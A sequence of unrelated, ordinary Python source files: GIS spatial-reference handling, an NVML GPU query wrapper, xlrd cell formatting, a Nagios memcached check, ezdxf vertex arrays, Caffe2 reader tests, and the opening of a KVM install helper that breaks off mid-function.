self.srs except Exception as msg: pass try: self._srs = gdal.SpatialReference(self.proj4text) return self.srs except Exception as msg: pass raise Exception('Could not get OSR SpatialReference from WKT: %s\nError:\n%s' % (self.wkt, msg)) else: raise Exception('GDAL is not installed.') @property def ellipsoid(self): """ Returns a tuple of the ellipsoid parameters: (semimajor axis, semiminor axis, and inverse flattening). """ if gdal.HAS_GDAL: return self.srs.ellipsoid else: m = self.spheroid_regex.match(self.wkt) if m: return (float(m.group('major')), float(m.group('flattening'))) else: return None @property def name(self): "Returns the projection name." return self.srs.name @property def spheroid(self): "Returns the spheroid name for this spatial reference." return self.srs['spheroid'] @property def datum(self): "Returns the datum for this spatial reference." return self.srs['datum'] @property def projected(self): "Is this Spatial Reference projected?" if gdal.HAS_GDAL: return self.srs.projected else: return self.wkt.startswith('PROJCS') @property def local(self): "Is this Spatial Reference local?" if gdal.HAS_GDAL: return self.srs.local else: return self.wkt.startswith('LOCAL_CS') @property def geographic(self): "Is this Spatial Reference geographic?" if gdal.HAS_GDAL: return self.srs.geographic else: return self.wkt.startswith('GEOGCS') @property def linear_name(self): "Returns the linear units name." if gdal.HAS_GDAL: return self.srs.linear_name elif self.geographic: return None else: m = self.units_regex.match(self.wkt) return m.group('unit_name') @property def linear_units(self): "Returns the linear units." if gdal.HAS_GDAL: return self.srs.linear_units elif self.geographic: return None else: m = self.units_regex.match(self.wkt) return m.group('unit') @property def angular_name(self): "Returns the name of the angular units." if gdal.HAS_GDAL: return self.srs.angular_name elif self.projected: return None else: m = self.units_regex.match(self.wkt) return m.group('unit_name') @property def angular_units(self): "Returns the angular units." if gdal.HAS_GDAL: return self.srs.angular_units elif self.projected: return None else: m = self.units_regex.match(self.wkt) return m.group('unit') @property def units(self): "Returns a tuple of the units and the name." if self.projected or self.local: return (self.linear_units, self.linear_name) elif self.geographic: return (self.angular_units, self.angular_name) else: return (None, None) @classmethod def get_units(cls, wkt): """ Class method used by GeometryField on initialization to retrive the units on the given WKT, without having to use any of the database fields. """ if gdal.HAS_GDAL: return gdal.SpatialReference(wkt).units else: m = cls.units_regex.match(wkt) return m.group('unit'), m.group('unit_name') @classmethod def get_spheroid(cls, wkt, string=True): """ Class method used by GeometryField on initialization to retrieve the `SPHEROID[..]` parameters from the given WKT. """ if gdal.HAS_GDAL: srs = gdal.SpatialReference(wkt) sphere_params = srs.ellipsoid sphere_name = srs['spheroid'] else: m = cls.spheroid_regex.match(wkt) if m: sphere_params = (float(m.group('major')), float(m.group('flattening'))) sphere_name = m.group('name') else: return None if not string: return sphere_name, sphere_params else: # `string` parameter used to place in format acceptable by PostGIS if len(sphere_params) == 3: radius, flattening = sphere_params[0], sphere_params[2] else: radius, flattening = sphere_params return 'SPHEROID["%s",%s,%s]' % (sphere_name, radius, flattening) def __str__(self): """ Returns the string representation. If GDAL is installed, it will be 'pretty' OGC WKT. """ try: return six.text_type(self.srs) except: return six.text_type(self.wkt)
# -*- coding: utf-8 -*- # File: nvml.py from ctypes import (byref, c_uint, c_ulonglong, CDLL, POINTER, Structure) import threading __all__ = ['NVMLContext'] NVML_ERROR_FUNCTION_NOT_FOUND = 13 NvmlErrorCodes = {"0": "NVML_SUCCESS", "1": "NVML_ERROR_UNINITIALIZED", "2": "NVML_ERROR_INVALID_ARGUMENT", "3": "NVML_ERROR_NOT_SUPPORTED", "4": "NVML_ERROR_NO_PERMISSION", "5": "NVML_ERROR_ALREADY_INITIALIZED", "6": "NVML_ERROR_NOT_FOUND", "7": "NVML_ERROR_INSUFFICIENT_SIZE", "8": "NVML_ERROR_INSUFFICIENT_POWER", "9": "NVML_ERROR_DRIVER_NOT_LOADED", "10": "NVML_ERROR_TIMEOUT", "11": "NVML_ERROR_IRQ_ISSUE", "12": "NVML_ERROR_LIBRARY_NOT_FOUND", "13": "NVML_ERROR_FUNCTION_NOT_FOUND", "14": "NVML_ERROR_CORRUPTED_INFOROM", "15": "NVML_ERROR_GPU_IS_LOST", "16": "NVML_ERROR_RESET_REQUIRED", "17": "NVML_ERROR_OPERATING_SYSTEM", "18": "NVML_ERROR_LIB_RM_VERSION_MISMATCH", "999": "NVML_ERROR_UNKNOWN"} class NvmlException(Exception): def __init__(self, error_code): super(NvmlException, self).__init__(error_code) self.error_code = error_code def __str__(self): return NvmlErrorCodes[str(self.error_code)] def _check_return(ret): if (ret != 0): raise NvmlException(ret) return ret class NVML(object): """ Loader for libnvidia-ml.so """ _nvmlLib = None _lib_lock = threading.Lock() def load(self): with self._lib_lock: if self._nvmlLib is None: self._nvmlLib = CDLL("libnvidia-ml.so.1") function_pointers = ["nvmlDeviceGetName", "nvmlDeviceGetUUID", "nvmlDeviceGetMemoryInfo", "nvmlDeviceGetUtilizationRates", "nvmlInit_v2", "nvmlShutdown", "nvmlDeviceGetCount_v2", "nvmlDeviceGetHandleByIndex_v2"] self.func_ptr = {n: self._function_pointer(n) for n in function_pointers} def _function_pointer(self, name): try: return getattr(self._nvmlLib, name) except AttributeError: raise NvmlException(NVML_ERROR_FUNCTION_NOT_FOUND) def get_function(self, name): if name in self.func_ptr.keys(): return self.func_ptr[name] _NVML = NVML() class NvidiaDevice(object): """Represent a single GPUDevice""" def __init__(self, hnd): super(NvidiaDevice, self).__init__() self.hnd = hnd def memory(self): """Memory information in bytes Example: >>> print(ctx.device(0).memory()) {'total': 4238016512L, 'used': 434831360L, 'free': 3803185152L} Returns: total/used/free memory in bytes """ class GpuMemoryInfo(Structure): _fields_ = [ ('total', c_ulonglong), ('free', c_ulonglong), ('used', c_ulonglong), ] c_memory = GpuMemoryInfo() _check_return(_NVML.get_function( "nvmlDeviceGetMemoryInfo")(self.hnd, byref(c_memory))) return {'total': c_memory.total, 'free': c_memory.free, 'used': c_memory.used} def utilization(self): """Percent of time over the past second was utilized. Details: Percent of time over the past second during which one or more kernels was executing on the GPU. Percent of time over the past second during which global (device) memory was being read or written Example: >>> print(ctx.device(0).utilization()) {'gpu': 4L, 'memory': 6L} """ class GpuUtilizationInfo(Structure): _fields_ = [ ('gpu', c_uint), ('memory', c_uint), ] c_util = GpuUtilizationInfo() _check_return(_NVML.get_function( "nvmlDeviceGetUtilizationRates")(self.hnd, byref(c_util))) return {'gpu': c_util.gpu, 'memory': c_util.memory} class NVMLContext(object): """Creates a context to query information Example: with NVMLContext() as ctx: num_gpus = ctx.num_devices() for device in ctx.devices(): print(device.memory()) print(device.utilization()) """ def __enter__(self): """Create a new context """ _NVML.load() _check_return(_NVML.get_function("nvmlInit_v2")()) return self def __exit__(self, type, value, tb): """Destroy current context""" _check_return(_NVML.get_function("nvmlShutdown")()) def num_devices(self): """Get number of devices """ c_count = c_uint() _check_return(_NVML.get_function( "nvmlDeviceGetCount_v2")(byref(c_count))) return c_count.value def devices(self): """ Returns: [NvidiaDevice]: a list of devices """ return [self.device(i) for i in range(self.num_devices())] def device(self, idx): """Get a specific GPU device Args: idx: index of device Returns: NvidiaDevice: single GPU device """ class GpuDevice(Structure): pass c_nvmlDevice_t = POINTER(GpuDevice) c_index = c_uint(idx) device = c_nvmlDevice_t() _check_return(_NVML.get_function( "nvmlDeviceGetHandleByIndex_v2")(c_index, byref(device))) return NvidiaDevice(device) if __name__ == '__main__': with NVMLContext() as ctx: print(ctx.devices()) print(ctx.devices()[0].utilization()) with NVMLContext() as ctx: print(ctx.devices()) print(ctx.devices()[0].utilization())
# Author: mozman <mozman@gmx.at> # Purpose: xfcell -- cell with convenient xf function # Created: 04.12.2010 # Copyright (C) 2010, Manfred Moitzi # License: BSD-style licence """ The XFCell() object contains the data for one cell. WARNING: You don't call this class yourself. You access Cell objects via methods of the Sheet object(s) that you found in the Book object that was returned when you called xlrd.open_workbook("myfile.xls"). Cell objects have four attributes: `ctype` is an int, `value` (which depends on `ctype`), `xf_index` and `sheet`, a reference to the containing sheet. If **formatting_info** is not enabled when the workbook is opened, xf_index will be **None**. The following table describes the types of cells and how their values are represented in Python. =============== ===== ============ ========================================== Type symbol Const Python value Note =============== ===== ============ ========================================== XL_CELL_EMPTY 0 "" XL_CELL_TEXT 1 str XL_CELL_NUMBER 2 float XL_CELL_DATE 3 float XL_CELL_BOOLEAN 4 int 1 means TRUE, 0 means FALSE XL_CELL_ERROR 5 int representing internal Excel codes; for a text representation, refer to the supplied dictionary error_text_from_code XL_CELL_BLANK 6 "" this type will appear only when open_workbook(..., formatting_info=True) is used. =============== ===== ============ ========================================== """ import datetime from .xldate import xldate_as_tuple from .biffh import XL_CELL_DATE, BaseObject class XFCell(BaseObject): """ Extended Cell() class with convenient methods for easy access of cell properties. """ __slots__ = ['sheet', 'ctype', 'value', 'xf'] def __init__(self, ctype, value, xf_index=None, sheet=None): self.sheet = sheet self.ctype = ctype self.value = value if xf_index is not None: self.xf = self.book.xf_list[xf_index] else: self.xf = None @property def book(self): return self.sheet.book @property def has_xf(self): return (self.xf is not None) @property def xf_index(self): if self.has_xf: return self.xf.xf_index else: return None @property def parent_style(self): return self.book.xf_list[self.xf.parent_style_index] @property def is_datetime(self): return self.ctype == XL_CELL_DATE @property def has_date(self): if self.is_datetime: return self.value > 1. return False def get_color(self, index): return self.book.colour_map[index] def datetime(self): """ Returns a datetime.datetime object if cell type is XL_CELL_DATE else raises a TypeError, and raises ValueError if the the cell has not date value (only time value is present). """ if self.is_datetime: if self.has_date: date = xldate_as_tuple(self.value, self.book.datemode) return datetime.datetime(*date) else: raise ValueError("Cell has no date value.") else: raise TypeError("Cell is not a XL_CELL_DATE.") def date(self): """ Returns a datetime.date object if cell type is XL_CELL_DATE else raises a **TypeError**. Raises **ValueError** if the cell doesn't have a date value (only time value is present). """ dt = self.datetime() return dt.date() def time(self): """ Returns a datetime.time object if cell type is XL_CELL_DATE else raises a TypeError. """ if self.is_datetime: date = xldate_as_tuple(self.value, self.book.datemode) return datetime.time(date[3], date[4], date[5]) else: raise TypeError("Cell is not a XL_CELL_DATE.") # # access the XFBackground() class # @property def background(self): if self.xf.is_style and \ self.xf._background_flag == 0: return self.xf.background elif self.xf._background_flag: return self.xf.background else: return self.parent_style.background def background_color(self): """ Get cell background-color as 3-tuple. """ color_index = self.xf.background.background_colour_index return self.get_color(color_index) def fill_pattern(self): return self.xf.background.fill_pattern def pattern_color(self): color_index = self.xf.background.pattern_colour_index return self.get_color(color_index) # # access the Font() class # @property def font_index(self): if self.xf.is_style and \ self.xf._font_flag == 0: return self.xf.font_index elif self.xf._font_flag: return self.xf.font_index else: return self.parent_style.font_index @property def font(self): """ Get the Font() class. """ return self.book.font_list[self.xf.font_index] def font_color(self): """ Get cell foreground-color as 3-tuple. """ return self.get_color(self.font.colour_index) # # access the Format() class # @property def format_key(self): if self.xf.is_style and \ self.xf._format_flag == 0: return self.xf.format_key elif self.xf._format_flag: return self.xf.format_key else: return self.parent_style.format_key @property def format(self): """ Get the Format() class. """ return self.book.format_map[self.format_key] def format_str(self): """ Get the associated 'format_str'. """ return self.format.format_str # # access the XFAligment() class # @property def alignment(self): if self.xf.is_style and \ self.xf._alignment_flag == 0: return self.xf.alignment elif self.xf._alignment_flag: return self.xf.alignment else: return self.parent_style.alignment # # access the XFBorder() class # @property def border(self): if self.xf.is_style and \ self.xf._border_flag == 0: return self.xf.border elif self.xf._border_flag: return self.xf.border else: return self.parent_style.border def bordercolors(self): """ Get border color as dict of rgb-color-tuples. """ border = self.border return { 'top': self.get_color(border.top_colour_index), 'bottom': self.get_color(border.bottom_colour_index), 'left': self.get_color(border.left_colour_index), 'right': self.get_color(border.right_colour_index), 'diag': self.get_color(border.diag_colour_index), } def borderstyles(self): """ Get border styles as dict of ints. """ border = self.border return { 'top': border.top_line_style, 'bottom': border.bottom_line_style, 'left': border.left_line_style, 'right': border.right_line_style, 'diag': border.diag_line_style, } @property def has_up_diag(self): """ Draw a line across the cell from bottom left to top right. """ return bool(self.border.diag_up) @property def has_down_diag(self): """ Draw a line across the cell from top left to bottom right. """ return bool(self.border.diag_down) # # access the XFProtection() class # @property def protection(self): if self.xf.is_style and \ self.xf._protection_flag == 0: return self.xf.protection elif self.xf._protection_flag: return self.xf.protection else: return self.parent_style.protection @property def is_cell_locked(self): return bool(self.protection.cell_locked) @property def is_formula_hidden(self): return bool(self.protection.cell_locked)
#!/usr/bin/env python import sys import memcache import textwrap import os.path import time from nagiosplugin import * """ Nagios plugin for checking memcached instances. Returns detailed memcached statistics for use by perfdata visualisation tools. Requirements ============= This script requires the following python modules: * argparse (included with python 2.7, otherwise install with 'easy_install argparse') * memcache (install with 'easy_install python-memcached' if easy_install is present) Notes ===== It's useful to monitor the following statistics: * uptime * curr_items * total_items * bytes * cmd_get - delta'd by time * get_hits - percentage of time delta * total_connections - delta'd by time * cmd_set - delta'd by time * get_misses - delta'd by time * evictions - delta'd by time * bytes_written - delta'd by time """ class MemcachedStats(NagiosPlugin): """ A Nagios plugin to check memcached statistics. Statistics are returned in perfdata formate. The following can be monitored: bytes used, bytes written, cache hits, cache hits (%), cache misses, number of current items, evictions, gets, sets, total connections, total items, uptime. """ VERSION = '0.1' SERVICE = 'Memcached' AUTHOR = 'Ally B' ## a constant for a special metric we calculate ourselves CACHE_HITS_PERCENTAGE = 'cache_hits_percentage' class Defaults(object): timeout = 3 hostname = 'localhost' port = 11211 delta_file_path = '/var/nagios/check_memcached_plugin_delta' delta_precision = 2 def parse_args(self, opts): """ Parse given options and arguments """ parser = self._default_parser(description=self.__doc__, version=self.VERSION, author=self.AUTHOR, hostname=self.Defaults.hostname, port=self.Defaults.port, delta_file_path=self.Defaults.delta_file_path, delta_precision=self.Defaults.delta_precision) parser.add_argument('-s', '--statistic', nargs='?', required=True, help="""The statistic to check. Use one of the following keywords: accepting_conns auth_cmds auth_errors bytes bytes_read bytes_written cas_badval cas_hits cas_misses cmd_flush cmd_get cmd_set conn_yields connection_structures curr_connections curr_items decr_hits decr_misses delete_hits delete_misses evictions get_hits get_misses incr_hits incr_misses limit_maxbytes listen_disabled_num pid pointer_size rusage_system rusage_user threads time total_connections total_items uptime version, or the special value: cache_hits_percentage """) args = parser.parse_args(opts) if 'verbose' not in args: args.verbose = False else: args.verbose = True return args def _get_statistic(self, statistic): "Returns a tuple containing the name of the specified statistic and its value." if not hasattr(self, 'memcache_statistic'): self.memcache_statistic = MemcacheStatistic(self.args.hostname, self.args.port) # calculate the cache hits percentage special statistic if statistic == self.CACHE_HITS_PERCENTAGE: get_hits = self._get_statistic('get_hits') cmd_get = self._get_statistic('cmd_get') # use separate values for get_hits and cmd_get compared to ordinary invocations to check those # statistics delta_cache_hits = NumberUtils.string_to_number(self._get_delta('get_hits_hit_cache_perc', get_hits)) delta_gets = NumberUtils.string_to_number(self._get_delta('cmd_get_hit_cache_perc', cmd_get)) try: cache_hits_percentage = round(delta_cache_hits * 100 / delta_gets, 2) except ZeroDivisionError: cache_hits_percentage = 0 if self.args.verbose: print "cache hits: %s, gets: %s" % (get_hits, cmd_get) print "delta_cache_hits: %s, delta_gets: %s" % (delta_cache_hits, delta_gets) print "cache hits %%: %s" % (cache_hits_percentage) return cache_hits_percentage else: return self.memcache_statistic.get_statistic(statistic, self.args.verbose) def _get_delta(self, statistic, current_value): "Returns the delta for a statistic" previous_value = self._get_value_from_last_invocation(statistic) delta_value = 0 # if we're trying to get the delta of the cache_hits_percentage, just divide by delta time since # it's already derived from delta values try: if statistic == self.CACHE_HITS_PERCENTAGE: delta = current_value else: delta = NumberUtils.string_to_number(current_value) - NumberUtils.string_to_number(previous_value['value']) delta_time = round(time.time() - previous_value['time']) delta_value = round(delta / delta_time, self.args.delta_precision) except (KeyError, ZeroDivisionError): pass self.statistic_collection[statistic] = current_value try: self.statistic_collection.persist() except IOError, error: raise NagiosPluginError("%s.\nProbably means we were unable to write to file %s" % (str(error), self.args.delta_file)) return delta_value def check(self): "Retrieves the required statistic value from memcache, and finds out which status it corresponds to." self.statistic = self.args.statistic self.statistic_value = self._get_statistic(self.statistic) if hasattr(self.args, 'delta_time'): self.statistic_value = self._get_delta(self.statistic, self.statistic_value) self.statistic += '_per_second' self.status = self._calculate_status(self.statistic_value) class MemcacheStatistic(object): "Returns statistics from a memcache server" def __init__(self, server, port): self.memcache = memcache.Client(['%s:%d' % (server, port)]) def get_statistic(self, statistic, verbose=False): """ Returns a statistic value. @param statistic The name of the statistic to retrieve @param vebose Whether to display verbose output """ server_stats = self.memcache.get_stats() # if no stats were returned, raise an Error try: stats = server_stats[0][1] except IndexError: if verbose: print "Unable to connect to memcache server. Check the host and port and make sure \nmemcached is running." raise NagiosPluginError("Unable to connect to memcache server. Check the host and port and make sure \nmemcached is running.") if statistic in stats.keys(): return stats[statistic] else: raise InvalidStatisticError("No statistic called '%s' was returned by the memcache server." % statistic) if __name__ == '__main__': try: checker = MemcachedStats(sys.argv[1:]) checker.check() status = checker.get_status() print checker.get_output() sys.exit(status) except (ThresholdValidatorError, InvalidStatisticError), e: print textwrap.fill(str(e), 80) sys.exit(NagiosPlugin.STATUS_UNKNOWN) except NagiosPluginError, e: print textwrap.fill("%s failed unexpectedly. Error was:" % (os.path.basename(__file__,)), 80) print textwrap.fill(str(e), 80) sys.exit(NagiosPlugin.STATUS_UNKNOWN)
# Copyright (c) 2018-2021 Manfred Moitzi # License: MIT License from array import array from typing import Iterable, MutableSequence, Sequence, Iterator from .types import DXFTag from .const import DXFTypeError, DXFIndexError, DXFValueError from .tags import Tags from ezdxf.tools.indexing import Index from ezdxf.lldxf.tagwriter import TagWriter from ezdxf.math import Matrix44 class TagList: """Store data in a standard Python ``list``.""" __slots__ = ("values",) def __init__(self, data: Iterable = None): self.values: MutableSequence = list(data or []) def clone(self) -> "TagList": """Returns a deep copy.""" return self.__class__(data=self.values) @classmethod def from_tags(cls, tags: Tags, code: int) -> "TagList": """ Setup list from iterable tags. Args: tags: tag collection as :class:`~ezdxf.lldxf.tags.Tags` code: group code to collect """ return cls(data=(tag.value for tag in tags if tag.code == code)) def clear(self) -> None: """Delete all data values.""" del self.values[:] class TagArray(TagList): """Store data in an :class:`array.array`. Array type is defined by class variable ``DTYPE``. """ __slots__ = ("values",) # Defines the data type of array.array() DTYPE = "i" def __init__(self, data: Iterable = None): self.values: array = array(self.DTYPE, data or []) def set_values(self, values: Iterable) -> None: """Replace data by `values`.""" self.values[:] = array(self.DTYPE, values) class VertexArray: """Store vertices in an ``array.array('d')``. Vertex size is defined by class variable ``VERTEX_SIZE``. """ # Defines the vertex size VERTEX_SIZE = 3 # set to 2 for 2d points __slots__ = ("values",) def __init__(self, data: Iterable = None): self.values = array("d", data or []) def __len__(self) -> int: """Count of vertices.""" return len(self.values) // self.VERTEX_SIZE def __getitem__(self, index: int): """Get vertex at `index`, extended slicing supported.""" if isinstance(index, slice): return list(self._get_points(self._slicing(index))) else: return self._get_point(self._index(index)) def __setitem__(self, index: int, point: Sequence[float]) -> None: """Set vertex `point` at `index`, extended slicing not supported.""" if isinstance(index, slice): raise DXFTypeError("slicing not supported") else: self._set_point(self._index(index), point) def __delitem__(self, index: int) -> None: """Delete vertex at `index`, extended slicing supported.""" if isinstance(index, slice): self._del_points(self._slicing(index)) else: self._del_point(self._index(index)) def __str__(self) -> str: """String representation.""" name = self.__class__.__name__ data = ",\n".join(str(p) for p in self) return "{} = [\n{}\n]".format(name, data) def __iter__(self) -> Iterator[Sequence[float]]: """Returns iterable of vertices.""" size = self.VERTEX_SIZE values = self.values index = 0 len_array = len(values) while index < len_array: yield tuple(values[index : index + size]) index += size def insert(self, pos: int, point: Sequence[float]): """Insert `point` in front of vertex at index `pos`. Args: pos: insert position point: point as tuple """ size = self.VERTEX_SIZE if len(point) != size: raise DXFValueError( "point requires exact {} components.".format(size) ) pos = self._index(pos) * size _insert = self.values.insert for value in reversed(point): _insert(pos, value) def clone(self) -> "VertexArray": """Returns a deep copy.""" return self.__class__(data=self.values) @classmethod def from_tags(cls, tags: Iterable[DXFTag], code: int = 10) -> "VertexArray": """Setup point array from iterable tags. Args: tags: iterable of :class:`~ezdxf.lldxf.types.DXFVertex` code: group code to collect """ vertices = array("d") for tag in tags: if tag.code == code: vertices.extend(tag.value) # type: ignore return cls(data=vertices) def _index(self, item) -> int: return Index(self).index(item, error=DXFIndexError) def _slicing(self, index) -> Iterable[int]: return Index(self).slicing(index) def _get_point(self, index: int) -> Sequence[float]: size = self.VERTEX_SIZE index = index * size return tuple(self.values[index : index + size]) def _get_points(self, indices) -> Iterable: for index in indices: yield self._get_point(index) def _set_point(self, index: int, point: Sequence[float]): size = self.VERTEX_SIZE if len(point) != size: raise DXFValueError(f"point requires exact {size} components.") if isinstance(point, (tuple, list)): point = array("d", point) index = index * size self.values[index : index + size] = point # type: ignore def _del_point(self, index: int) -> None: size = self.VERTEX_SIZE pos = index * size del self.values[pos : pos + size] def _del_points(self, indices: Iterable[int]) -> None: del_flags = set(indices) size = self.VERTEX_SIZE survivors = array( "d", ( v for i, v in enumerate(self.values) if (i // size) not in del_flags ), ) self.values = survivors def export_dxf(self, tagwriter: "TagWriter", code=10): delta = 0 for c in self.values: tagwriter.write_tag2(code + delta, c) delta += 10 if delta > 20: delta = 0 def append(self, point: Sequence[float]) -> None: """Append `point`.""" if len(point) != self.VERTEX_SIZE: raise DXFValueError( f"point requires exact {self.VERTEX_SIZE} components." ) self.values.extend(point) def extend(self, points: Iterable[Sequence[float]]) -> None: """Extend array by `points`.""" for point in points: self.append(point) def clear(self) -> None: """Delete all vertices.""" del self.values[:] def set(self, points: Iterable[Sequence[float]]) -> None: """Replace all vertices by `points`.""" self.clear() self.extend(points) def transform(self, m: Matrix44) -> None: """Transform vertices by transformation matrix `m`.""" values = array("d") for vertex in m.transform_vertices(self): values.extend(vertex) self.values = values
from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals from caffe2.python.dataio import Reader, ReaderWithLimit, ReaderWithTimeLimit from caffe2.python.dataset import Dataset from caffe2.python.pipeline import pipe from caffe2.python.schema import Struct, NewRecord, FeedRecord from caffe2.python.session import LocalSession from caffe2.python.task import TaskGroup, final_output, WorkspaceType from caffe2.python.test_util import TestCase from caffe2.python.cached_reader import CachedReader from caffe2.python import core, workspace from caffe2.python.net_builder import ops import numpy as np import os import shutil import tempfile import time def init_dataset(ws, size=100): src_init = core.Net('src_init') with core.NameScope('src'): src_values = Struct(('label', np.array(range(size)))) src_blobs = NewRecord(src_init, src_values) src_ds = Dataset(src_blobs) FeedRecord(src_blobs, src_values, ws) ws.run(src_init) return src_ds def read_all_data(ws, reader, session): dst_init = core.Net('dst_init') with core.NameScope('dst'): dst_ds = Dataset(reader.schema().clone_schema()) dst_ds.init_empty(dst_init) session.run(dst_init) with TaskGroup(workspace_type=WorkspaceType.GLOBAL) as tg: pipe(reader, dst_ds.writer(), num_runtime_threads=8) session.run(tg) return ws.blobs[str(dst_ds.content().label())].fetch() class ReaderWithDelay(Reader): """Test reader class that inserts a delay between reading batches.""" def __init__(self, reader, delay): Reader.__init__(self, schema=reader._schema) self.reader = reader self.delay = delay def setup_ex(self, global_init_net, global_finish_net): self.reader.setup_ex(global_init_net, global_finish_net) def read_ex(self, local_init_net, local_finish_net): read_net = core.Net('reader_body') def sleep_op(*args, **argd): time.sleep(self.delay) read_net.Python(sleep_op)([], []) return ([read_net], ) + self.reader.read(read_net) class TestReaderWithLimit(TestCase): def test_runtime_threads(self): ws = workspace.C.Workspace() session = LocalSession(ws) src_ds = init_dataset(ws) totals = [None] * 3 def proc(rec): # executed once with ops.task_init(): counter1 = ops.CreateCounter([], ['global_counter']) counter2 = ops.CreateCounter([], ['global_counter2']) counter3 = ops.CreateCounter([], ['global_counter3']) # executed once per thread with ops.task_instance_init(): task_counter = ops.CreateCounter([], ['task_counter']) # executed on each iteration ops.CountUp(counter1) ops.CountUp(task_counter) # executed once per thread with ops.task_instance_exit(): with ops.loop(ops.RetrieveCount(task_counter)): ops.CountUp(counter2) ops.CountUp(counter3) # executed once with ops.task_exit(): totals[0] = final_output(ops.RetrieveCount(counter1)) totals[1] = final_output(ops.RetrieveCount(counter2)) totals[2] = final_output(ops.RetrieveCount(counter3)) return rec # Read full data set from original reader with TaskGroup() as tg: pipe(src_ds.reader(), num_runtime_threads=8, processor=proc) session.run(tg) self.assertEqual(totals[0].fetch(), 100) self.assertEqual(totals[1].fetch(), 100) self.assertEqual(totals[2].fetch(), 8) # Read with a count-limited reader with TaskGroup() as tg: q1 = pipe(src_ds.reader(), num_runtime_threads=2) q2 = pipe( ReaderWithLimit(q1.reader(), num_iter=25), num_runtime_threads=3) pipe(q2, processor=proc, num_runtime_threads=6) session.run(tg) self.assertEqual(totals[0].fetch(), 25) self.assertEqual(totals[1].fetch(), 25) self.assertEqual(totals[2].fetch(), 6) def _test_limit_reader_init_shared(self, size): ws = workspace.C.Workspace() session = LocalSession(ws) # Build test dataset src_ds = init_dataset(ws, size=size) # Create an identically sized empty destnation dataset dst_init = core.Net('dst_init') with core.NameScope('dst'): dst_ds = Dataset(src_ds.content().clone_schema()) dst_ds.init_empty(dst_init) ws.run(dst_init) return ws, session, src_ds, dst_init, dst_ds def _test_limit_reader_shared(self, reader_class, size, expected_read_len, expected_finish, num_threads, read_delay, **limiter_args): ws, session, src_ds, dst_init, dst_ds = \ self._test_limit_reader_init_shared(size) # Read without limiter # WorkspaceType.GLOBAL is required because we are fetching # reader.data_finished() after the TaskGroup finishes. with TaskGroup(workspace_type=WorkspaceType.GLOBAL) as tg: if read_delay > 0: reader = reader_class(ReaderWithDelay(src_ds.reader(), read_delay), **limiter_args) else: reader = reader_class(src_ds.reader(), **limiter_args) pipe(reader, dst_ds.writer(), num_runtime_threads=num_threads) session.run(tg) read_len = len(sorted(ws.blobs[str(dst_ds.content().label())].fetch())) self.assertEqual(read_len, expected_read_len) self.assertEqual( sorted(ws.blobs[str(dst_ds.content().label())].fetch()), list(range(expected_read_len)) ) self.assertEqual(ws.blobs[str(reader.data_finished())].fetch(), expected_finish) def test_count_limit_reader_without_limit(self): # No iter count specified, should read all records. self._test_limit_reader_shared(ReaderWithLimit, size=100, expected_read_len=100, expected_finish=True, num_threads=8, read_delay=0, num_iter=None) def test_count_limit_reader_with_zero_limit(self): # Zero iter count specified, should read 0 records. self._test_limit_reader_shared(ReaderWithLimit, size=100, expected_read_len=0, expected_finish=False, num_threads=8, read_delay=0, num_iter=0) def test_count_limit_reader_with_low_limit(self): # Read with limit smaller than size of dataset self._test_limit_reader_shared(ReaderWithLimit, size=100, expected_read_len=10, expected_finish=False, num_threads=8, read_delay=0, num_iter=10) def test_count_limit_reader_with_high_limit(self): # Read with limit larger than size of dataset self._test_limit_reader_shared(ReaderWithLimit, size=100, expected_read_len=100, expected_finish=True, num_threads=8, read_delay=0, num_iter=110) def test_time_limit_reader_without_limit(self): # No duration specified, should read all records. self._test_limit_reader_shared(ReaderWithTimeLimit, size=100, expected_read_len=100, expected_finish=True, num_threads=8, read_delay=0.1, duration=0) def test_time_limit_reader_with_short_limit(self): # Read with insufficient time limit size = 50 num_threads = 4 sleep_duration = 0.25 duration = 1 expected_read_len = int(round(num_threads * duration / sleep_duration)) # Because the time limit check happens before the delay + read op, # subtract a little bit of time to ensure we don't get in an extra read duration = duration - 0.25 * sleep_duration self._test_limit_reader_shared(ReaderWithTimeLimit, size=size, expected_read_len=expected_read_len, expected_finish=False, num_threads=num_threads, read_delay=sleep_duration, duration=duration) def test_time_limit_reader_with_long_limit(self): # Read with ample time limit self._test_limit_reader_shared(ReaderWithTimeLimit, size=50, expected_read_len=50, expected_finish=True, num_threads=4, read_delay=0.25, duration=6) def test_cached_reader(self): ws = workspace.C.Workspace() session = LocalSession(ws) def build_source_reader(size): src_ds = init_dataset(ws, size) return src_ds.reader() with tempfile.NamedTemporaryFile(delete=False) as f: path = f.name f.close() os.remove(path) # Read data for the first time. cached_reader1 = CachedReader(build_source_reader(100)) init_step = cached_reader1.build_cache(path) session.run(init_step) data = read_all_data(ws, cached_reader1, session) self.assertEqual(sorted(data), list(range(100))) # Read data from cache. workspace.ResetWorkspace() cached_reader2 = CachedReader(build_source_reader(200)) init_step = cached_reader2.build_cache(path) session.run(init_step) data = read_all_data(ws, cached_reader2, session) self.assertEqual(sorted(data), list(range(100))) shutil.rmtree(path) # We removed cache so we expect to receive data from original reader workspace.ResetWorkspace() cached_reader3 = CachedReader(build_source_reader(300)) init_step = cached_reader3.build_cache(path) session.run(init_step) data = read_all_data(ws, cached_reader3, session) self.assertEqual(sorted(data), list(range(300))) shutil.rmtree(path)
#!/usr/bin/env python """Python helper for virt-install(1)""" import os import platform import re import string import random import include_funcs import yaml __author__ = 'Jason Callaway' __email__ = 'jason@jasoncallaway.com' __license__ = 'Apache License Version 2.0' __version__ = '0.1' __status__ = 'alpha' class KVMInstall(object): def setup_lvm(self): """Setup the VMs root volume with LVM""" # Grab the config values we need from_lvm = self.config['clone'] size = str(self.config['disk']) name = self.config['name'] # Clone an LVM volume from the baseimage volume. command = ['lvcreate', '-s', from_lvm, '-L', size + 'G', '-n', name] try: self.funcs.run_command(command, self.config) except Exception, e: raise e def setup_image(self): """Setup the VMs root volume with an image file""" # Grab the config values we need from_image = self.config['image'] path = os.path.split(from_image)[0] extension = os.path.splitext(from_image)[1] size = self.config['disk'] name = self.config['name'] # Copy the base image to our new file. command = ['cp', from_image, path + '/' + name + extension] try: self.funcs.run_command(command, self.config) except Exception, e: raise e def generate_mac(self, prefix): """Generate a unique MAC address.""" generated_mac = '' # Determine how long our prefix is num_colons = prefix.count(':') # Add that number of hex substrings for _ in range(5 - num_colons): # This is a little big funky. I wanted to be sure we have only # a-f,0-9, but the string.hexdigits string includes a-f,A-F, # so we have to convert to lower case and strip out duplicates # which we do by adding them to a set. domain = ''.join(set(string.hexdigits.lower())) new_hex = self.funcs.get_random(domain, 2) generated_mac = 